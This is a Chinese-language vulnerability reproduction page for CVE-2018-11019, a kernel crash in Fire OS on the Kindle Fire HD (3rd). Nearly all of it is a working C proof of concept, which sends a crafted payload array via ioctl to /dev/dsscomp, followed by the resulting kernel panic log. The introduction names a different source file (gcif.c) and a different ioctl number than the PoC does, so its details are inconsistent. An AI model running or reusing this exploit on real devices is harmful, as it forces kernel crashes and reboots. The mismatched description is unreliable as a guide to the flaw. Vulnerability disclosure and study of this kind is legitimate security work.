CVE-2018-11019 Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞
一、漏洞简介
Amazon Kindle Fire HD(3rd)是美国亚马逊(Amazon)公司的一款 Fire OS 平板电脑设备。Fire OS 是运行在其中的一套专用于 Amazon 设备的基于 Android 开发的移动操作系统。kernel 是其中的一个内核组件。 Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3 版本中的 kernel 组件的 kernel/omap/drivers/misc/gcx/gcioctl/gcif.c 文件存在安全漏洞。攻击者可借助 3221773726 命令利用该漏洞注入特制的参数,造成内核崩溃。
二、漏洞影响
Fire OS 4.5.5.3
三、复现过程
poc
/*
* This is poc of Kindle Fire HD 3rd
* A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
* Related buggy struct name is dsscomp_setup_dispc_data.
* This Poc should run with permission to do ioctl on /dev/dsscomp.
*
* The fowllwing is kmsg of kernel crash infomation:
*
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>
const static char *driver = "/dev/dsscomp";
static command = 1118064517;
int main(int argc, char **argv, char **env) {
unsigned int payload[] = {
0xffffffff, 0x00000003, 0x5d200040, 0x79900008, 0x8f5928bd, 0x78b02422,
0x00000000, 0xffffffff, 0xf4c50400, 0x007fffff, 0x8499f562, 0xffff0400,
0x001b131d, 0x60818210, 0x00000007, 0xffffffff, 0x00000000, 0x9da9041c,
0xcd980400, 0x001f03f4, 0x00000007, 0x2a34003f, 0x7c80d8f3, 0x63102627,
0xc73643a8, 0xa28f0665, 0x00000000, 0x689e57b4, 0x01ff0008, 0x5e7324b1,
0xae3b003f, 0x0b174d86, 0x00000400, 0x21ffff37, 0xceb367a4, 0x00000040,
0x00000001, 0xec000f9e, 0x00000001, 0x000001ff, 0x00000000, 0x00000000,
0x0000000f, 0x0425c069, 0x038cc3be, 0x0000000f, 0x00000080, 0xe5790100,
0x5b1bffff, 0x0000d355, 0x0000c685, 0xa0070000, 0x0010ffff, 0x00a0ff00,
0x00000001, 0xff490700, 0x0832ad03, 0x00000006, 0x00000002, 0x00000001,
0x81f871c0, 0x738019cb, 0xbf47ffff, 0x00000040, 0x00000001, 0x7f190f33,
0x00000001, 0x8295769b, 0x0000003f, 0x869f2295, 0xffffffff, 0xd673914f,
0x05055800, 0xed69b7d5, 0x00000000, 0x0107ebbd, 0xd214af8d, 0xffff4a93,
0x26450008, 0x58df0000, 0xd16db084, 0x03ff30dd, 0x00000001, 0x209aff3b,
0xe7850800, 0x00000002, 0x30da815c, 0x426f5105, 0x0de109d7, 0x2c1a65fc,
0xfcb3d75f, 0x00000000, 0x00000001, 0x8066be5b, 0x00000002, 0xffffffff,
0x5cf232ec, 0x680d1469, 0x00000001, 0x00000020, 0xffffffff, 0x00000400,
0xd1d12be8, 0x02010200, 0x01ffc16f, 0xf6e237e6, 0x007f0000, 0x01ff08f8,
0x000f00f9, 0xbad07695, 0x00000000, 0xbaff0000, 0x24040040, 0x00000006,
0x00000004, 0x00000000, 0xbc2e9242, 0x009f5f08, 0x00800000, 0x00000000,
0x00000001, 0xff8800ff, 0x00000001, 0x00000000,
0x000003f4, 0x6faa8472, 0x00000400, 0xec857dd5, 0x00000000, 0x00000040,
0xffffffff, 0x3f004874, 0x0000b77a, 0xec9acb95, 0xfacc0001, 0xffff0001,
0x0080ffff, 0x3600ff03, 0x00000001, 0x8fff7d7f, 0x6b87075a, 0x00000000,
0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x001001ff, 0x00000000,
0x00000001, 0xff1f0512, 0x00000001, 0x51e32167, 0xc18c55cc, 0x00000000,
0xffffffff, 0xb4aaf12b, 0x86edfdbd, 0x00000010, 0x0000003f, 0xabff7b00,
0xffff9ea3, 0xb28e0040, 0x000fffff, 0x458603f4, 0xffff007f, 0xa9030f02,
0x00000001, 0x002cffff, 0x9e00cdff, 0x00000004, 0x41414141, 0x41414141,
0x41414141, 0x41414141
};
int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %d\n", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}
printf("Try open %s with command 0x%x.\n", driver, command);
printf("System will crash and reboot.\n");
if(ioctl(fd, command, &payload) < 0) {
printf("Allocation of structs failed, %d\n", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
}
崩溃日志
[ 164.793151] Unable to handle kernel NULL pointer dereference at virtual address 00000037
[ 164.802459] pgd = c26ec000
[ 164.805664] [00000037] *pgd=82f42831, *pte=00000000, *ppte=00000000
[ 164.813415] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[ 164.819458] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[ 164.827239] CPU: 1 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[ 164.834686] PC is at dev_ioctl+0x4ac/0x10c4
[ 164.839416] LR is at down_timeout+0x40/0x5c
[ 164.844146] pc : [<c03178e8>] lr : [<c006e9b8>] psr: 60000013
[ 164.844146] sp : c25a1e70 ip : c25a1e50 fp : c25a1f04
[ 164.857116] r10: 00000000 r9 : d8c0aca8 r8 : bed5c610
[ 164.863128] r7 : c0a25b50 r6 : c25a0000 r5 : bed5c610 r4 : 0000000f
[ 164.870391] r3 : 00001403 r2 : 00000000 r1 : 20000013 r0 : 00000000
[ 164.877807] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 164.885894] Control: 10c5387d Table: 826ec04a DAC: 00000015
[ 164.892303]
[ 164.892333] PC: 0xc0317868:
[ 164.897308] 7868 30d22003 33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f
[ 164.907989] 7888 e3c6603f e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064
[ 164.918670] 78a8 e1a01005 e3a02008 e50b3088 e1a00003 ebfcfa5f e3500000 1a00001e e51b4060
[ 164.929351] 78c8 e3020710 e59f7bdc ebf4db32 e1a01000 e2870038 ebf55c25 e3500000 1a0002e0
[ 164.939880] 78e8 e5943028 e1a08000 e5940024 e1a02007 e2841024 e5803004 e5830000 e5b23070
[ 164.950561] 7908 e5871070 e2420038 e5831004 e5843024 e5842028 ebf55bb9 e50b8060 e50b8064
[ 164.961212] 7928 ea000006 e24b1064 e50b1088 e51b0088 e3a01008 ebfd0387 e3a03004 e50b3064
[ 164.971771] 7948 e5963008 e2952008 30d22003 33a03000 e3530000 1affffc5 e1a00005 e51b1088
[ 164.982299]
[ 164.982330] LR: 0xc006e938:
[ 164.987426] e938 e1a01000 0a000007 e3a05000 e2433001 e5843008 e1a00004 eb18d7ad e1a00005
[ 164.997955] e958 e24bd014 e89da830 e1a00004 e50b1018 eb18d135 e51b1018 e1a05000 eafffff4
[ 165.008636] e978 e1a0c00d e92dd878 e24cb004 e1a04000 e1a05001 eb18d91b e5943008 e3530000
[ 165.019317] e998 e1a06000 0a000007 e3a05000 e2433001 e5843008 e1a00004 e1a01006 eb18d794
[ 165.029846] e9b8 e1a00005 e89da878 e1a01005 e1a00004 eb18d158 e1a05000 eafffff5 e1a0c00d
[ 165.040374] e9d8 e92dd800 e24cb004 e5903000 e1a0c000 e3530000 0a00000b e5910008 e5932008
[ 165.051055] e9f8 e1500002 da000003 ea000006 e5932008 e1520000 ba000003 e283c004 e5933004
[ 165.061737] ea18 e3530000 1afffff8 e5813004 f57ff05f e3a00000 e58c1000 e89da800 e1a0c00d
[ 165.072265]
[ 165.072265] SP: 0xc25a1df0:
[ 165.077362] 1df0 00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff
[ 165.087890] 1e10 c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013
[ 165.098419] 1e30 00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8
[ 165.109100] 1e50 00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff
[ 165.119781] 1e70 00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920
[ 165.130340] 1e90 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff
[ 165.141021] 1eb0 00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580
[ 165.151702] 1ed0 c25a1efc c25a1ee0 c02089fc 00000000 c719ab40 00000004 c719ab40 bed5c610
[ 165.162353]
[ 165.162384] IP: 0xc25a1dd0:
[ 165.167327] 1dd0 c0070df8 c00795ac c25a0000 00000001 00000004 d454d0f4 60000013 00000001
[ 165.178009] 1df0 00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff
[ 165.188537] 1e10 c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013
[ 165.199249] 1e30 00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8
[ 165.209899] 1e50 00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff
[ 165.220581] 1e70 00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920
[ 165.231109] 1e90 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff
[ 165.241790] 1eb0 00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580
[ 165.252441]
[ 165.252441] FP: 0xc25a1e84:
[ 165.257415] 1e84 c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff
[ 165.268066] 1ea4 0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14 00000000
[ 165.278717] 1ec4 00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000 c719ab40
[ 165.289276] 1ee4 00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08 c0136044
[ 165.299926] 1f04 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[ 165.310607] 1f24 c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004 c25a0000
[ 165.321136] 1f44 00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004 c25a0000
[ 165.331695] 1f64 00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000 00000400
[ 165.342346]
[ 165.342376] R6: 0xc259ff80:
[ 165.347320] ff80 00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000
[ 165.358001] ffa0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 165.368682] ffc0 00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000
[ 165.379241] ffe0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 165.389770] 0000 00000000 00000002 00000000 d72b0980 c0a0e840 00000001 00000015 c265dc00
[ 165.400451] 0020 00000000 c25a0000 c09ddc50 d72b0980 de949300 c1620b40 c25a1b7c c25a1ac8
[ 165.411132] 0040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[ 165.421661] 0060 005634c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
[ 165.432342]
[ 165.432342] R7: 0xc0a25ad0:
[ 165.437316] 5ad0 00010105 01010005 01040901 00040001 ffff0101 00000000 00000000 00040b03
[ 165.447875] 5af0 01040101 ffff0100 00000000 00000000 0000ffff 00000000 0e0c0000 01010005
[ 165.458526] 5b10 01000105 0000ffff 00000000 0e0c0000 01010005 00000105 01040901 00040001
[ 165.469207] 5b30 ffff0101 00000000 00000000 00040b03 01040101 3f3f0100 00010001 01000001
[ 165.479736] 5b50 00000000 00000000 00000001 c0a25b5c c0a25b5c c0a25b64 c0a25b64 00000000
[ 165.490417] 5b70 00000000 00000001 c0a25b78 c0a25b78 c0a25b80 c0a25b80 00000000 00000000
[ 165.500946] 5b90 00000000 c0a25b94 c0a25b94 c0a25b9c c0a25b9c 00000000 00000000 00000001
[ 165.511627] 5bb0 c0a25bb0 c0a25bb0 c0a25bb8 c0a25bb8 c0a25bc0 c0a25bc0 c0a25bc8 c0a25bc8
[ 165.522186]
[ 165.522186] R9: 0xd8c0ac28:
[ 165.527282] ac28 d8c0ac28 d8c0ac28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[ 165.537841] ac48 00000000 00000000 d8c0ac50 d8c0ac50 00000000 c0aa5174 c0aa5174 c0aa5148
[ 165.548492] ac68 5aefbbda 00000000 00000000 00000000 d8c0ac80 00000000 00000000 00000000
[ 165.559020] ac88 00200000 00000000 00000000 d8c0ac94 d8c0ac94 dd3f6080 dd3f6080 00000000
[ 165.569702] aca8 000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[ 165.580261] acc8 d8c0ad80 dd3ede70 00001064 00000001 0fb00000 5aefbbda 2e19b832 5aefbbda
[ 165.590911] ace8 2e19b832 5aefbbda 2e19b832 00000000 00000000 00000000 00000000 00000000
[ 165.601593] ad08 00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0ad24
[ 165.612121] Process gcioctl_poc (pid: 3932, stack limit = 0xc25a02f8)
[ 165.619445] Stack: (0xc25a1e70 to 0xc25a2000)
[ 165.624359] 1e60: 00000001 00000028 000fffff c25a1ea0
[ 165.633605] 1e80: c25a1edc c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8
[ 165.642822] 1ea0: ffffffff 0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14
[ 165.652038] 1ec0: 00000000 00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000
[ 165.661102] 1ee0: c719ab40 00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08
[ 165.670318] 1f00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[ 165.679565] 1f20: dcf8c440 c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004
[ 165.688781] 1f40: c25a0000 00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004
[ 165.697875] 1f60: c25a0000 00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000
[ 165.707092] 1f80: 00000400 bed5c638 00010e64 00000000 00000036 c0013e08 00000000 c25a1fa8
[ 165.716308] 1fa0: c0013c60 c0136578 bed5c638 00010e64 00000004 c0085d9e bed5c610 bed5c610
[ 165.725402] 1fc0: bed5c638 00010e64 00000000 00000036 00000000 00000000 00000000 bed5c624
[ 165.734619] 1fe0: 00000000 bed5c5f4 000106a4 0002918c 60000010 00000004 00000000 00000000
[ 165.743835] Backtrace:
[ 165.746856] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[ 165.756256] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[ 165.765502] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 165.774780] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e64 r4:bed5c638
[ 165.783203] Code: e2870038 ebf55c25 e3500000 1a0002e0 (e5943028)
[ 165.793060] Board Information:
[ 165.793060] Revision : 0001
[ 165.793060] Serial : 0000000000000000
[ 165.793090] SoC Information:
[ 165.793090] CPU : OMAP4470
[ 165.793090] Rev : ES1.0
[ 165.793121] Type : HS
[ 165.793121] Production ID: 0002B975-000000CC
[ 165.793121] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[ 165.793121]
[ 165.844757] ---[ end trace aba846a2af6e75b7 ]---
[ 165.850097] Kernel panic - not syncing: Fatal exception
[ 165.856109] CPU0: stopping
[ 165.859252] Backtrace:
[ 165.862274] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[ 165.871643] r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950
[ 165.878784] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[ 165.887908] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[ 165.897399] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5380>] (__irq_svc+0x40/0x70)
[ 165.906707] Exception stack(0xd8dcfc38 to 0xd8dcfc80)
[ 165.912384] fc20: c153a9f8 00000000
[ 165.921600] fc40: 00000002 c153aa08 00000007 c153a9f8 d8d72210 b6eaf010 d8caee34 bab7375f
[ 165.930816] fc60: 00000001 d8dcfcac 0009eded d8dcfc80 c010a5b4 c010a5fc 20070013 ffffffff
[ 165.940032] r6:ffffffff r5:20070013 r4:c010a5fc r3:c010a5b4
[ 165.947052] [<c010a534>] (follow_page+0x0/0x238) from [<c010af94>] (__get_user_pages+0x13c/0x3f0)
[ 165.957031] [<c010ae58>] (__get_user_pages+0x0/0x3f0) from [<c010b350>] (get_user_pages+0x50/0x58)
[ 165.967102] [<c010b300>] (get_user_pages+0x0/0x58) from [<c00ff544>] (get_user_pages_fast+0x64/0x7c)
[ 165.977233] r4:d8caee3c
[ 165.980468] [<c00ff4e0>] (get_user_pages_fast+0x0/0x7c) from [<c01eeff0>] (fuse_copy_fill+0x1bc/0x238)
[ 165.990905] [<c01eee34>] (fuse_copy_fill+0x0/0x238) from [<c01ef0a4>] (fuse_copy_one+0x38/0x68)
[ 166.000579] r6:d8dcdb00 r5:d8dce000 r4:d8dcfe24 r3:00000000
[ 166.007690] [<c01ef06c>] (fuse_copy_one+0x0/0x68) from [<c01efe64>] (fuse_dev_do_read+0x3e4/0x69c)
[ 166.017761] r4:dd243c00
[ 166.020874] [<c01efa80>] (fuse_dev_do_read+0x0/0x69c) from [<c01f03c0>] (fuse_dev_read+0x84/0x9c)
[ 166.030853] [<c01f033c>] (fuse_dev_read+0x0/0x9c) from [<c0124ecc>] (do_sync_read+0xb0/0xf0)
[ 166.040222] r7:00000000 r6:00000000 r5:00000000 r4:00000000
[ 166.047363] [<c0124e1c>] (do_sync_read+0x0/0xf0) from [<c01258f4>] (vfs_read+0xa4/0x148)
[ 166.056488] [<c0125850>] (vfs_read+0x0/0x148) from [<c01259d8>] (sys_read+0x40/0x78)
[ 166.065093] r8:00040050 r7:b6eaf010 r6:d8e08900 r5:00000000 r4:00000000
[ 166.073547] [<c0125998>] (sys_read+0x0/0x78) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[ 166.082855] r8:c0013e08 r7:00000003 r6:b6eaf008 r5:b73828a0 r4:b6eaf010
[ 166.091217] CPU0 PC (0) : 0xc0019b2c
[ 166.095397] CPU0 PC (1) : 0xc0019b2c
[ 166.099456] CPU0 PC (2) : 0xc0019b2c
[ 166.103515] CPU0 PC (3) : 0xc0019b2c
[ 166.107574] CPU0 PC (4) : 0xc0019b2c
[ 166.111785] CPU0 PC (5) : 0xc0019b2c
[ 166.115814] CPU0 PC (6) : 0xc0019b2c
[ 166.119873] CPU0 PC (7) : 0xc0019b2c
[ 166.124084] CPU0 PC (8) : 0xc0019b2c
[ 166.128112] CPU0 PC (9) : 0xc0019b2c
[ 166.132171] CPU1 PC (0) : 0xc003ee38
[ 166.136352] CPU1 PC (1) : 0xc003ee54
[ 166.140411] CPU1 PC (2) : 0xc003ee54
[ 166.144470] CPU1 PC (3) : 0xc003ee54
[ 166.148681] CPU1 PC (4) : 0xc003ee54
[ 166.152709] CPU1 PC (5) : 0xc003ee54
[ 166.156768] CPU1 PC (6) : 0xc003ee54
[ 166.160980] CPU1 PC (7) : 0xc003ee54
[ 166.165008] CPU1 PC (8) : 0xc003ee54
[ 166.169067] CPU1 PC (9) : 0xc003ee54
[ 166.173126]
[ 166.175048] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[ 166.175079]
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论